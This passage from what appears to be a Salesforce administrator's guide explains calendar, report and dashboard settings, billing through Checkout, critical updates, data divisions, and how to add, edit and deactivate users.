pages, grant those user the “Show Custom Sidebar On All Pages” permission.

Note: If the Show Custom Sidebar Components on All Pages user interface setting is selected, the
“Show Custom Sidebar On All Pages” permission is not available.

Calendar Settings
Enable Home Page Hover Links for Events

Enables hover links in the calendar section of the Home tab. On the Home tab, users can hover the mouse over the
subject of an event to see the details of the event in an interactive overlay. This option is enabled by default. Note that
this checkbox only controls the Home tab; hover links are always available on other calendar views.

The fields available in the event detail and edit overlays are defined in a mini page layout.

Note: If you create all day events, we recommend adding the All Day Event field to the events mini page
layout.

Enable Drag-and-Drop Editing on Calendar Views
Enables the dragging of events on single user daily and weekly calendar views. This allows users to reschedule events
without leaving the page. This option is enabled by default.
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Note:  Calendar views might load less quickly when this checkbox is enabled.

Enable Click-and-Create Events on Calendar Views
Allows users to create events on day and weekly calendar views by double-clicking a specific time slot and entering the
details of the event in an interactive overlay. The fields available in the event detail and edit overlays are defined in a
mini page layout.

Note that recurring events and multi-person events are not supported for click-and-create events on calendar views.

Enable Drag-and-Drop Scheduling on List Views
Allows users to create events associated with records by dragging records from list views on to weekly calendar views and
entering the details of the event in an interactive overlay. This option is disabled by default. The fields available in the
event detail and edit overlays are defined in a mini page layout.

Enable Hover Links for My Tasks List
Enables hover links for tasks in the My Tasks section of the Home tab and on the calendar day view. This option is
enabled by default. Users can hover the mouse over the subject of a task to see the details of that task in an interactive
overlay.

The information presented on these overlays is configured by your administrator.

Setup Settings
Enable Enhanced Page Layout Editor

When enabled, the enhanced page layout editor replaces the current interface for editing page layouts with a feature-rich
WYSIWYG editor that contains all of the functionality of the original page layout editor as well as several improvements.

Enable Enhanced Profile List Views
Enables enhanced list views and inline editing on the profiles list page. With inline editing in enhanced profile list views,
you can manage multiple profiles at once.

Enable Enhanced Profile User Interface
Enables the enhanced profile user interface, which allows you to easily navigate, search, and modify settings for a single
profile.

Enable Streaming API
Enables Streaming API, which allows you to receive notifications for changes to data that match a SOQL query that
you define, in a secure and scalable way. This field is selected by default. If you don’t see this checkbox, first verify that
your Salesforce edition has API access. If your Salesforce edition has API access and you don’t see the checkbox, contact
salesforce.com.

Enable Custom Object Truncate
Enables truncating custom objects, which permanently removes all of the records from a custom object while keeping
the object and its metadata intact for future use.

Enable Improved Setup User Interface
When enabled, users’ personal settings are moved from the Setup menu to a separate My Settings menu, accessible from
the username menu. Additionally, the Setup link is moved from the username menu to the Force.com App Menu. If
you change this setting, be sure to notify all users in your organization.
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Advanced Settings
Activate Extended Mail Merge

Enables Extended Mail Merge for your organization. When selected, the Mass Mail Merge link is available in the Tools
area on the home pages for accounts, contacts, and leads. Also, single mail merges requested from the Activity History
related list on a record are performed using Extended Mail Merge functionality.

Extended Mail Merge is available by request only. Contact salesforce.com Customer Support if you are interested in
this feature.

Always save Extended Mail Merge documents to the Documents tab
When enabled, all mail merge documents generated using Extended Mail Merge are added to the user's personal
documents folder on the Documents tab, rather than delivered as email attachments. Users are sent confirmation emails
when their mail merge requests have completed. Those emails include links for retrieving generated documents from
the Documents tab. Note that these documents count against your organization's storage limits.

Customizing Report and Dashboard Settings
Administrators can set up and manage report and dashboard settings from the Reports & Dashboards page.

Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To modify report and dashboard settings:

To get to this page, from Setup, click Customize > Reports & Dashboards.

See Also:
Customize Report and Dashboard User Interface Settings
Customize Report and Dashboard Email Settings
Turn On Enhanced Sharing for Reports and Dashboards
Upgrade Report Builder

Customize Report and Dashboard User Interface Settings
Report and dashboard user interface settings that you can modify include floating report headers, the dashboard finder, the
report timeout warning, and dashboard component snapshots. You can choose to enable or disable each of these for your
organization.

Available in: All Editions except Database.com
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User Permissions Needed

“Customize Application”To modify report and dashboard settings:

1. From Setup, click Customize > Reports & Dashboards > User Interface Settings.
2. Select or deselect options to modify the settings for your organization.

Enable Floating Report Headers

Floating report headers keep the column headings on tabular reports in sight no matter how far users scroll down
report results. With floating report headers, users can scroll to the bottom of lengthy tabular reports without having
to scroll back to the top to view the names of the column headings. Users can also click floating report headers to
sort data in a specific column. When users sort data by clicking a floating report heading, the report refreshes and
redirects users to the beginning of report results.

Enable Dashboard Finder

Dashboard finder uses auto-complete to help users quickly find dashboards in the Dashboards tab. This option is
enabled by default. To find a dashboard on the Dashboards tab, start typing its name in the search filter, and all
dashboards matching that text are dynamically displayed in the drop-down list. The list first shows dashboards the
user viewed recently, and then other dashboards appear in alphabetical order by folder. The first 1000 results are
shown in a single list; above 1000, results are shown 500 per page. Users only see dashboards in folders they can
access. Disable this option to use the static drop-down list instead.

Enable Report Timeout Warning

The report timeout warning analyzes reports at runtime, identifies those that are highly complex and likely to time
out, and displays a warning. This option is enabled by default. Users with permission to modify reports can edit the
report to improve performance. Users can also run the report in spite of the warning.

The report timeout warning only analyzes reports run manually from the Run Reports page. It doesn’t analyze
scheduled reports, reports run from dashboards, or reports run using background export.

The report timeout warning might occasionally flag reports that don’t time out. Additionally, the warning assumes
that your organization’s reports will time out after 10 minutes, which is the standard length of time reports can run
before timing out. If your organization has extended the limit to 20 minutes, the reports might be less likely to time
out. Keep in mind that, even if flagged reports run successfully, they remain highly complex, required extended run
times, and could time out in the future.

Enable Dashboard Component Snapshots

Dashboard component snapshots let users with access to dashboards post static images of dashboard components to
Chatter user or group feeds, making the snapshot visible to all users. Chatter feed tracking for dashboards must first
be enabled.

Important:  This option lets users override dashboard visibility settings, making snapshots visible to all
Chatter users. Though this makes it easy to share time-specific data without having to add people to dashboard
folders, be aware that users can inadvertently post sensitive or confidential information.
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3. Click Save.

See Also:
Customizing Report and Dashboard Settings

Customize Report and Dashboard Email Settings
Control the way email notifications are sent, including image handling in dashboard emails for Lotus Notes users and sending
reports and dashboard refresh notifications to portal users.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To modify report and dashboard settings:

1. From Setup, click Customize > Reports & Dashboards > Email Settings.
2. Select or clear the following options to modify the settings for your organization:

Use Images Compatible with Lotus Notes in Dashboard Emails

Dashboard refresh notifications can be sent to specified users when a scheduled dashboard refresh completes. By
default, Salesforce sends images in dashboard emails as .png (Portable Network Graphic) files, which are not
supported in Lotus Notes. When you enable the Use Images Compatible with Lotus Notes in Dashboard
Emails > option, Salesforce uses .jpg images, which Lotus Notes supports, when sending dashboard emails. The
“Schedule Dashboard” permission is required to view this option.

Note:  Dashboard emails that contain images compatible with Lotus Notes are substantially larger and the
image quality may be lower.

Allow Reports and Dashboards to Be Sent to Portal Users

This option, disabled by default, is available to Enterprise and Unlimited Edition organizations that have a Customer
Portal or partner portal set up. Unless enabled, only internal Salesforce users can receive reports and dashboard refresh
notifications. If you enable this option, all internal and portal users specified as recipients receive reports and dashboards.

3. Click Save.

See Also:
Customizing Report and Dashboard Settings
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Turn On Enhanced Sharing for Reports and Dashboards
When you enable analytics sharing, Salesforce converts your users’ existing folder access levels to use new, more detailed access
levels.

Available in: All editions except Database.com

User Permissions Needed

“View Setup and Configuration”To view the analytics folder sharing setting:

“Customize Application”To modify the analytics folder sharing setting:

When analytics sharing is in effect, all users in the organization get Viewer access by default to report and dashboard folders
that are shared with them. Users may have more access if they are Managers or Editors on a given folder, or if they have more
administrative user permissions. Each user’s access to folders under the new capability is based on the combination of folder
access and user permissions they had before enhanced folder sharing was enabled.

1. From Setup, click Reports & Dashboards > Folder Sharing.
2. Select Enable Analytics Sharing.
3. Click Report and Dashboard Folder Sharing.

Important:  If you go back to the old folder sharing model, pre-existing report and dashboard folders go back to the
state they were in before.

• If a folder existed before analytics folder sharing was enabled, its properties and sharing settings are rolled back
to their previous state.

• If a folder was created while enhanced analytics folder sharing was in effect, it is hidden from the folder list and
all its sharing settings are removed. Administrative user permissions are still in effect.

See Also:
Customizing Report and Dashboard Settings
Tip sheet: Analytics Folder Sharing
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Upgrade Report Builder
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To modify report and dashboard settings:

We've released an updated version of report builder, the powerful drag-and-drop editor for reports. With this upgrade:

• All profiles get access to the report builder by default. (You may continue to see the “Report Builder” permission in
permission sets and profiles and the PermissionSet and Profile objects in the API, though the upgrade overrides those
settings.)

• The old report wizard will be available only to users in Accessibility Mode.

• Group and Professional Edition organizations can use report builder.

• You get scatter charts, a new chart type for reports.

Administrators for existing organizations must manually enable this upgrade. New organizations automatically get the latest
version of report builder. If you don't see the Report Builder Upgrade section on the User Interface Settings page, the upgrade
has already been enabled for your organization. It’s important to understand that assigning the “Report Builder” permission
to all users through profiles or permission sets isn’t the same thing as enabling report builder for your entire organization. To
do that, you need to follow the procedure in this topic.

Important:  Upgrading does not affect any of your existing reports. However, once you upgrade, you can't return to
the old report wizard.

To enable report builder for all users:

1. From Setup, click Customize > Reports & Dashboards > User Interface Settings.
2. Review the Report Builder Upgrade section of the page and click Enable. If you don’t see the button, report builder has

already been enabled for your entire organization.
3. Confirm your choice by clicking Yes, Enable Report Builder for All Users.

See Also:
Communicate Your Report Data Effectively

Managing Billing & Licenses
Available in: Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

Checkout contains details about your organization’s Salesforce account, including your licenses, billing information, orders,
invoices, and statements.
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To access Checkout, from Setup, click Checkout Summary then choose Proceed to Checkout.

Note: Users with the “Manage Billing” permission have automatic access to Checkout. These users can also grant
access to others within the organization Granting Checkout Access on page 268.

From Checkout, you can:

• Order more licenses and products.

• Change your billing information for an active contract.

• Change credit card information associated with an active contract.

• View your organization’s orders and invoices.

• View your previously saved quotes—both quotes you created from Salesforce and quotes created by a sales representative.

• Place orders to purchase new products.

• Contact salesforce.com to request sales assistance.

• Log a case for any Checkout related questions, issues, or concerns.

For detailed instructions on using Checkout, see the Checkout User Guide.

Purchasing Additional User Licenses
Users with Checkout enabled can add licenses for your organization at any time while a contract is in effect.

Available in: Personal, Contact Manager, Group, Professional, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Manage Billing”To purchase additional user licenses:

If your organization doesn’t have self-service access to Checkout, submit a request to your salesforce.com representative.

Note: At any point during the quote creation process, you can click Request Assistance to contact your salesforce.com
account representative.

1. From Setup, click Checkout Summary and click Proceed to Checkout.

Tip:  You can also access Checkout from Setup by clicking Company Profile > Company Information and
clicking Buy More Licenses.

2. Click Add More Products.
3. Enter the number of license subscriptions you want to purchase.

If licenses are purchased in the middle of a billing cycle, the subscription is prorated based on the number of days left in
that billing cycle. Total Price reflects Monthly/Unit Price for the order term, which is specified above the products.
For example, if an order’s subscriptions start on 5/14/2013 and end on 5/7/2014, Total Price will reflect Monthly/Unit
Price for 11.8 months.

4. Click Proceed to Place Order.
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5. Review your order and payment information. Click the pencil if you need to make changes.
6. Read and confirm that you accept the Master Subscription Agreement and any other required terms and agreements.

Depending on your contract with salesforce.com and the products you’re purchasing, you may have to accept Contract
Special Terms or Product Specific Terms.

7. Click Place Order.

See Also:
Managing Billing & Licenses
Granting Checkout Access
Removing User Licenses
Changing Billing Information
Checkout User Guide
Converting a Trial Using Checkout

Removing User Licenses
Salesforce doesn’t support using Checkout to reduce the number of licenses for your organization.

If you want to remove licenses, contact your salesforce.com representative.

Note:  Deactivating user accounts doesn’t change the number of user licenses for which your company is billed.

See Also:
Managing Billing & Licenses
Granting Checkout Access
Purchasing Additional User Licenses

Changing Billing Information

Available in: Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

To change your organization’s payment and billing information, you must have access to Checkout. If your organization
doesn’t have self-service access to Checkout, submit a request to your salesforce.com representative.

1. From Setup, click Checkout Summary then click Proceed to Checkout.
2. Click Change Contract Billing Address.
3. Update your organization’s address and contact information as necessary.
4. Click Save.
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For detailed instructions on using Checkout, see the Checkout User Guide.

See Also:
Managing Billing & Licenses

Changing Credit Card or Direct Debit Information

Available in: Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

To change your credit card or direct debit information, you must have access to Checkout. If your organization doesn’t have
self-service access to Checkout, submit a request to your salesforce.com representative.

To access Checkout, from Setup, click Checkout Summary and then click Proceed to Checkout.

For specific instructions on changing your payment information in Checkout, see the Checkout User Guide.

Note:

You can’t pay your invoice online. Your newly-updated credit or debit card will be charged within 24 hours if there
is an outstanding balance on your account. To pay an invoice via credit card, please call the salesforce.com Customer
Service department.

See Also:
Managing Billing & Licenses

Viewing Credit Memos, Account Statements, and Invoices

Available in: Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

To view your organization’s credit memos, account statements, and invoices, you must have access to Checkout. If your
organization doesn’t have self-service access to Checkout, submit a request to your salesforce.com representative.

From a credit memo, statement, or invoice details page, you can print, log cases to investigate issues, or contact salesforce.com.

To access Checkout, from Setup, click Checkout Summary and then click Proceed to Checkout.

Note:  Your account may not have a starting balance depending on the duration of time chosen. You can open all
payments, invoices, and credit memos to see more detail or to print them.
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For detailed instructions on using Checkout, see the Checkout User Guide.

See Also:
Managing Billing & Licenses

Granting Checkout Access

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Billing”To grant Checkout access:

“Manage Users”To edit users:

Users with the “Manage Billing” permission have access to Checkout when it is enabled for your organization. These users
can also grant access to other users within your organization. Users with Checkout access can purchase Salesforce licenses,
AppExchange app licenses, and other related products. Additionally, within Checkout, users can view the organization's
quotes, installed products, orders, invoices, payments, and contracts.

To give a user access to Checkout:

1. From Setup, click Manage Users > Users.
2. Click on the appropriate user's name to open the user detail page.
3. Click Edit.
4. Select the Checkout Enabled checkbox. The user is notified by email when his or her Checkout account is activated

and available for login.

See Also:
Managing Billing & Licenses
Purchasing Additional User Licenses
Checkout User Guide
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Critical Updates Overview
Available in: All Editions

User Permissions Needed

“View Setup”To view critical updates:

“Modify All Data” and “Customize Application”To activate critical updates:

Salesforce.com periodically releases updates that improve the performance, logic, and usability of Salesforce, but may affect
your existing customizations. When these updates become available, Salesforce lists them in Setup at Critical Updates, sends
a notification email to administrators, and displays a message when administrators go to Setup.

To ensure a smooth transition, each update has an opt-in period during which you can manually activate and deactivate the
update an unlimited number of times to evaluate its impact on your organization and modify affected customizations as
necessary. The opt-in period ends on the auto-activation date, at which time Salesforce permanently activates the update.

Warning: Salesforce.com recommends testing each update by activating it in either your Developer Sandbox or your
production environment during off-peak hours.

To manage critical updates, from Setup, click Critical Updates. From this page, you can:

• View the summary, status, and auto-activation date for any update that Salesforce has not permanently activated.

• Click Review to view the detail page of any update that Salesforce has not permanently activated. The details include a
list of the customizations in your organization that the update might affect and the activation history, which lists each time
the update was activated and deactivated.

• Click Activate to activate any inactive update.

• Click Deactivate to deactivate any active update that Salesforce has not permanently activated.

Notes on Critical Updates
• Salesforce analyzes your organization to determine if a critical update potentially affects your customizations. If your

customizations are not affected, Salesforce automatically activates the update in your organization, and the update does
not appear in Setup, click Critical Updates to enable the update.

• On the scheduled auto-activation date, Salesforce permanently activates the update. After auto-activation, you cannot
deactivate the update.

• Each update detail page describes how your customizations might be affected and how you can correct any unintended
functionality.

• Salesforce displays a message the first time you access the setup menu after a critical update becomes available. The message
lets you choose to have Salesforce display the updates immediately or remind you about the updates later.

269

Critical Updates OverviewSet Up Your Organization



Divisions Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Divisions let you segment your organization's data into logical sections, making searches, reports, and list views more meaningful
to users. For example, you can create a report to show the opportunities for just the North American division, allowing you
to get accurate sales numbers for the North American sales team. Divisions are useful for organizations with extremely large
amounts of data.

Note:  Divisions do not restrict users’ access to data and are not meant for security purposes.

Divisions can be assigned to users and to other records.

• Record-level division—Division is a field on individual records that marks the record as belonging to a particular division.
A record can belong to a division created by the administrator, or it can belong to the standard “global” division, which is
created automatically when your organization enables divisions. A record can belong to only one division at a time.

• Default division—Users are assigned a default division that applies to their newly created accounts, leads, and custom
objects that are enabled for divisions.

• Working division—If you have the “Affected by Divisions” permission, you can set the division using a drop-down list
in the sidebar. Then, searches will show only the data for the current working division. You can change your working
division at any time. If you don’t have the “Affected by Divisions” permission, you’ll always see records in all divisions.

The following table shows how using divisions affects different areas.

DescriptionArea

If you have the “Affected by Divisions” permission:Search
• In sidebar search, you can select a single division, or all

divisions.
• In advanced search, you can select a single division or all

divisions.
• In global search, you can search a single division or all

divisions.
• For searches in lookup dialogs, the results include records

in the division you select from the drop-down list in the
lookup dialog window.

Note: All searches within a specific division also
include the global division. For example, if you search
within a division called Western Division, your results
will include records found in both the Western
Division and the global division.

If you do not have the “Affected by Divisions” permission,
your search results always include records in all divisions.
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DescriptionArea

If you have the “Affected by Divisions” permission, list views
include only the records in the division you specify when

List views

creating or editing the list view. List views that don’t include
all records (such as My Open Cases) include records in all
divisions.

If you do not have the “Affected by Divisions” permission,
your list views always include records in all divisions.

Chatter doesn’t support divisions. For example, you can’t use
separate Chatter feeds for different divisions.

Chatter

If you have the “Affected by Divisions” permission, you can
set your report options to include records in just one division

Reports

or all divisions. Reports that use standard filters (such as My
Cases or My team’s accounts) show records in all divisions,
and can’t further limited to a specific division.

If you do not have the “Affected by Divisions” permission,
your reports always include records in all divisions.

When viewing the detail page of a record, the related lists
show all associated records that you have access to, regardless
of division.

Viewing records and related lists

When you create new accounts, leads, or custom objects that
are enabled for divisions, the division is automatically set to
your default division, unless you override this setting.

When you create new records related to an account or other
record that already has a division, the new record is assigned

Creating new records

to the existing record’s division. For example, if you create a
custom object record that is on the detail side of a master-detail
relationship with a custom object that has divisions enabled,
it is assigned the master record’s division.

When you create records that are not related to other records,
such as private opportunities or contacts not related to an
account, the division is automatically set to the global division.

When editing accounts, leads, or custom objects that are
enabled for divisions, you can change the division. All records

Editing records

that are associated through a master-detail relationship are
automatically transferred to the new division as well. For
example, contacts and opportunities are transferred to the new
division of their associated account, and detail custom objects
are transferred to their master record’s new division.

When editing other types of records, you can’t change the
division setting.
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DescriptionArea

When you enable divisions for a custom object, Salesforce
initially assigns each record for that custom object to the global
division.

When you create a custom object record:

Custom objects

• If the custom object is enabled for divisions, the record
adopts your default division.

• If the custom object is on the detail side of a master-detail
relationship with a divisions-enabled custom object, the
record adopts the division of the master record.

If you convert a lookup relationship to a master-detail
relationship, detail records lose their current division and
inherit the division of their master record.

If you convert a master-detail relationship to a lookup
relationship, the division for any detail records is determined
by the previous master record.

Relationships

If you delete a master-detail relationship, the division for any
detail records is determined by the previous master record.

See Also:
Setting Up Divisions
Creating and Editing Divisions
Changing the Default Division for Users
Changing Your Default Division
Changing Your Working Division
Transferring Multiple Records Between Divisions
Reporting With Divisions
Using Divisions in Search and List Views
Administrator tip sheet: Getting Started with Divisions

Setting Up Divisions
When setting up divisions, you must create divisions and assign records to divisions to make sure that your data is categorized
effectively.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Modify All Data”To create or edit divisions:

Before you can use the divisions feature for your organization, you must enable divisions. If you are using a standard object,
contact salesforce.com to enable divisions for your organization. For custom objects, select Enable Divisions on the custom
object definition page to enable divisions.

1. Plan which divisions you need based on how you want to segment your data.
For example, you may want one division for all the records belonging to your North American sales team and one division
for your European sales team.

100

2. Create divisions for your organization. All existing records are assigned to the “Global” division by default. You can change
the default division name, create additional divisions, and move user and data records between divisions.

3. Transfer leads, accounts, and custom objects into relevant divisions. When records are assigned to a division, associated
records are assigned the same division.
For example, when you change the division assigned to an account, related records such as contacts and opportunities are
assigned to the same division.

4. Add division fields to page layouts.
5. Add divisions to field-level security.
6. Set the default division for all users. New accounts and leads are assigned to the user’s default division unless the user

explicitly assigns a different division. New records related to existing records are assigned to the existing record’s division.
7. Enable the “Affected by Divisions” permission for users who should be able to limit list views by division, search within a

division, or report within a division.

Users who don’t have the “Affected by Divisions” permission still have a default user-level division, can view division fields,
change the division for a record, and specify a division when creating records.

See Also:
Divisions Overview
Creating and Editing Divisions
Transferring Multiple Records Between Divisions
Changing the Default Division for Users
Changing Your Default Division

Creating and Editing Divisions
Creating logical divisions for your organization helps you segment your records to make searching and reporting easier.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To create or edit divisions:
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Divisions must be enabled for the organization.

All records are initially assigned to the default “Global” division until the user defines the division. You can create up to 100
divisions, including any inactive ones.

1. From Setup, click Company Profile > Manage Divisions.
2. Click New to create a divisions, or Edit change an existing division.
3. Enter the division name.
4. Select the checkbox to make the division active.

Note:  You cannot deactivate a division if users or lead queues are assigned to that division.

5. Click Save.
6. If you want to change the order that divisions appears in the Divisions picklist, click Sort, then to use the arrow buttons

to move divisions higher or lower in the list.

See Also:
Divisions Overview
Setting Up Divisions
Transferring Multiple Records Between Divisions
Changing the Default Division for Users
Changing Your Default Division

Transferring Multiple Records Between Divisions
Select groups of records to move into or between divisions.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To mass transfer records:

To reassign the divisions for multiple records at one time, transfer groups of accounts, leads, or users between divisions.

1. From Setup, click Data Management > Mass Division Transfer.
2. Select the type of record you want to transferred, thenclick Next. When you change the division assigned to an account,

related records such as contacts and opportunities are assigned to the same division. When you change the division assigned
to a custom object, other custom objects belonging to it are also transferred to the new division.

3. Select search conditions that records must match and click Next.
4. Select the division you want to transfer the records to.
5. If you’re transferring user records, you can select Change the division... to also transfer the users’ records to the

new division.
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6. Click Transfer. You’ll receive an email notification when the transfer is complete. If 5,000 or more records are being
transferred, the request will be placed in a queue for processing.

See Also:
Divisions Overview
Setting Up Divisions
Creating and Editing Divisions
Changing the Default Division for Users
Changing Your Default Division

Changing Your Default Division
If you can manage user settings, you can change your own default division.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To change your default division:

If your organization uses divisions to segment data, you’re assigned a default division that is applied to new accounts, leads,
and appropriate custom objects you create. The default division doesn’t prevent you from viewing or creating records in other
divisions. If, however, the new record is related to an existing record, the new record is assigned the same division as the
existing record.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• From Setup, click My Personal Information > Personal Information.
• From My Settings, click Personal > Advanced User Details.

3. Next to the Default Division field, click Change.
4. Select a new default division.
5. Select an option to determine if the records you own should be transferred to the new division.
6. Click Save.

See Also:
Divisions Overview
Changing the Default Division for Users
Changing Your Working Division
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Changing the Default Division for Users
If you can manage user settings, you can change the default division for users.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To change a user’s default division:

If your organization uses divisions to segment data, a default division is assigned to all users and is applied to new accounts,
leads, and appropriate custom objects .The default division doesn’t prevent users from viewing or creating records in other
divisions. If, however, the new record is related to an existing record, the new record is assigned the same division as the
existing record.

1. From Setup, click Manage Users > Users.
2. Click the name, alias, or username of the user whose default division you want to change.
3. Next to the Default Division field, click Change.
4. Select a new default division.
5. Select an action to be applied to records the user already owns.
6. Click Save.

See Also:
Divisions Overview
Changing Your Default Division
Changing Your Working Division

Reporting With Divisions
If your organization uses divisions to segment data, you can customize your reports to show records within specific divisions.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Affected by Divisions”To limit reports by division:

Use the Division drop-down list on the report to select one of the following.

• A specific division
• Your current working division.
• All records across all divisions.
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Note:  Reports that use standard filters (such as My Cases or My Team’s Accounts) show records in all divisions.
These reports can’t be further limited to a specific division.

See Also:
Divisions Overview
Using Divisions in Search and List Views
Changing Your Working Division

How do I discontinue my service?
If the service does not meet your needs, you can discontinue it. Users who are up-to-date with their payments may request a
complete download of the data that exists in the system. Contact salesforce.com Support to submit your request directly.

MANAGE USERS

User Management Overview
The available user management options vary according to which Salesforce Edition you have.

In Salesforce, every user is identified by a username, password, and a single profile. The profile determines what tasks users
can perform, what data they see, and what they can do with the data.

Depending on your organization's Salesforce edition and the additional features your organization has purchased, you may
have user licenses—such as Marketing, Connect Offline, and Sales Anywhere—which give users the ability to access other
features that are only available with a specific user license. A user can be assigned to one or more of these licenses. You can
also set up accounts for users outside your organization who need to access a limited set of fields and objects. These user licenses
can grant access to Customer Portal, partner portal, or Self-Service. Finally, using Salesforce to Salesforce, you can create
connections to share records with other Salesforce users outside of your organization.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

As an administrator, you can perform user management tasks such as creating and editing users, resetting passwords, and
creating Google Apps accounts. You can also grant permissions, create and manage other types of users, create custom fields,
set custom links, run reports on users, and delegate user administration tasks to other users.

See Also:
Viewing and Managing Users
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Viewing and Managing Users
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Customer Portal and partner portals are not available in Database.com

User Permissions Needed

“View Setup and Configuration”To view user lists :

To view and manage the users in your organization, from Setup, click Manage Users > Users. The user list shows all the users
in your organization, partner portal, and Salesforce Customer Portal. From the user list, you can:

• Create one user.

• Create multiple users.

• Reset passwords for selected users.

• Edit a user.

• View a user's detail page by clicking the name, alias, or username.

• View or edit a profile by clicking the profile name.

• If Google Apps™ is enabled in your organization, export users to Google and create Google Apps accounts by clicking
Export to Google Apps

Tips for Managing Users
• You can create custom fields for users and set custom links to display on the user detail page. To access these options, from

Setup, click Customize > Users.
• You can use the sidebar search to search for any user in your organization, regardless of the user's status. However, when

using a lookup dialog from fields within records, the search results return only active users. You can also run user reports
in the Reports tab.

• To simplify user management in organizations with large numbers of users, delegate aspects of user administration to
non-administrator users.

Note:  You cannot delegate administrative duties related to your organization to partner portal or Customer Portal
users. However, you can delegate some portal administrative duties to portal users.

See Also:
Deactivating (Deleting) Users
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Adding a Single User

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create new users:

The maximum number of users you can create is determined by your Edition.

To create a new user for your organization:

1. From Setup, click Manage Users > Users.
2. Click New User.
3. Enter the user’s first name, last name, and email address. The email address becomes the username.

Note:  If the user’s name includes non-English characters, the user must add the specified language to the mail
format settings within Outlook if viewing email in Outlook.

4. In Professional, Enterprise, Unlimited, and Developer Editions, select a Role. Depending on your organization’s sharing
settings, roles can specify the level of visibility that users have into your organization’s data.

5. Select a User License. The profiles available to you depend on the user license you choose.

Note:

• Some options become unavailable depending on the license type you choose. For example, the Marketing
User and Allow Forecasting options are not available for Force.com user licenses because the Forecasts
and Campaigns tabs are not available to users with a Force.com license. Force.com user licenses are not available
for Professional, Group, or Contact Manager Editions.

• You can change a Salesforce license to a Force.com license, but you can’t change a Force.com license to a
Salesforce license.

6. Select a profile, which specifies the user’s minimum permissions and access settings.
7. Select the other options and enter the remaining user information as needed.
8. If your organization has Approvals enabled, you can set the user’s approver settings, such as delegated approver, manager,

and preference for receiving approval request emails.
9. In Unlimited, Enterprise and Developer Edition organizations, you can select Send Apex Warning Emails to send

email to the user when an application that invokes Apex uses more than half of the resources specified by the governor
limits. This feature can be used during Apex code development to test the amount of resources being used at runtime.

10. Check Generate new password and notify user immediately to have the user’s login name and a temporary
password emailed to the new user. Temporary passwords for new users expire in six months, and users must change their
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password the first time they log in. The login link in the email can only be used once. A user who follows the link without
setting a password must have an administrator reset their password before they can log in.

See Also:
Adding Multiple Users
Editing Users
User Fields

Adding Multiple Users

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create new users:

The maximum number of users you can create is determined by your Edition.

The Add Multiple Users page provides a way to quickly add users to your organization. Depending on the number of available
licenses, you can create up to 10 users. With this page, you specify the minimum information needed. Once you’ve created
the users, edit individual users to specify more details for each one.

To add multiple users:

1. From Setup, click Manage Users > Users.
2. Click Add Multiple Users.
3. If multiple user license types are available in your organization, select the user license you want to associate with the users

you’ll create. The user license determines the available profiles. If only one type of license is available, it’s automatically
selected.

4. Specify the information for each user.

DescriptionField

The user’s first name.First Name

The user’s last name.Last Name

The user’s email address. The email address entered here
becomes the username.

Email (User Name)

Specifies the user's minimum permissions and access settings.Profile

If roles are set up for your organization, specifies the level
of visibility that the user has into your organization’s data.

Role

5. Select Generate passwords and notify user via email to email a login name and temporary password to each
new user.
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Temporary passwords for new users expire in six months, and users must change their password the first time they log in.
The login link in the email can only be used once. A user who follows the link without setting a password must have an
administrator reset their password before they can log in.

6. Click Save.

See Also:
Adding a Single User
Editing Users
User Fields

Editing Users

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To edit users:

To view or edit user information:

1. From Setup, click Manage Users > Users.

You can also edit your organization's users from the Users in Role related list in the role detail page.

2. Click Edit next to a user’s name.
3. Change the settings as needed. Additionally, be aware of the following behaviors and options when editing a user.

• If you change a user’s email address and Generate new password and notify user immediately is deselected,
a confirmation message will be sent to the new email address that you entered. The user must click the link provided
in that message for the new email address to take effect. This process ensures system security. When generating a new
password for a user, the new password is automatically sent to the user’s email address and email verification is not
enforced.

• If you change a user's username, a confirmation email with a login link is sent to the email address associated with that
user account. If the user has problems logging into future sessions, they can use the link in the email. Problems might
occur because an organization could have multiple login servers. It may take up to 24 hours for the username change
to replicate to all of them. The link in the email connects directly to the server where the actual username change was
made. This ensures that users can always log in, even if server replication is slow.

• Click Unlock to unlock a user that is locked out of Salesforce. This button is only available when a user is locked out.
• If your organization has managed packages installed, click Assign Licenses to assign a package license to the user.

Click Remove to remove a license assigned to the user.
• Click Grant Checkout Access to grant the user access to Checkout.

4. Click Save.
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Note:

• Users can change or add to their own personal information after they log in.

• Administrators can restrict the domain names of users’ email addresses to a list of explicitly allowed domains. Any
attempts to set an email address with another domain will result in an error message. Contact salesforce.com to
enable this functionality for your organization.

See Also:
User Fields

Deactivating (Deleting) Users
You can't delete a user, but you can deactivate an account so a user can no longer log in to Salesforce.

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To deactivate users:

Watch a Demo: Removing Users’ Access to Salesforce (3:45 minutes)

1. From Setup, click Manage Users > Users.
2. Click Edit next to a user’s name.
